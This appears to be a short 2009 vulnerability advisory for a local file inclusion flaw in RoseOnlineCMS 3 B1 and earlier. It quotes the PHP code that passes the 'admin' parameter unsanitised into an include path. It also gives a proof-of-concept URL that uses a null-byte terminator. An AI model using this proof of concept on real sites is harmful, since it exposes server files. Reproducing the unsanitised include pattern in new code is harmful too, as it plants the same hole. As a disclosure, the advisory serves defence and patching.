RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion

\#&#39;#/ (-.-) --------------------oOO---(_)---OOo------------------- | RoseOnlineCMS &#60;= 3 B1 (admin) Local File Inclusion | | (works only with magic_quotes_gpc = off) | ------------------------------------------------------ [!] Discovered: cr4wl3r &#60;cr4wl3r[!]linuxmail.org&#62; [!] Download: http://sourceforge.net/projects/rosecms/files/ [!] Date: 30.12.2009 [!] Remote: yes [!] Code : &#60;?PHP if (isset($_GET[&#39;write&#39;])) { $argv = explode(&#39;-&#39;,$_GET[&#39;write&#39;]); settype($argv,&#39;array&#39;); $_GET[&#39;admin&#39;] = @$argv[0]; $_GET[&#39;url&#39;] = @$argv[1]; $_GET[&#39;do&#39;] = @$argv[2]; $_GET[&#39;key&#39;] = @$argv[3]; } $admin = !isset($_GET[&#39;admin&#39;]) ? index : $_GET[&#39;admin&#39;] ; if (is_file(&#34;modules/admin/&#34;.$admin.&#34;.php&#34;)) { include(&#34;modules/admin/&#34;.$admin.&#34;.php&#34;); } else { echo(&#39;Administrator page not found. &#60;br&#62;&#60;br&#62; &#60;a href=index.php&#62;Click here to go back home&#60;/a&#62;&#39;); } ob_end_flush(); ?&#62; [!] PoC: [RoseOnlineCMS_path]/modules/admincp.php?admin=[LFI%00]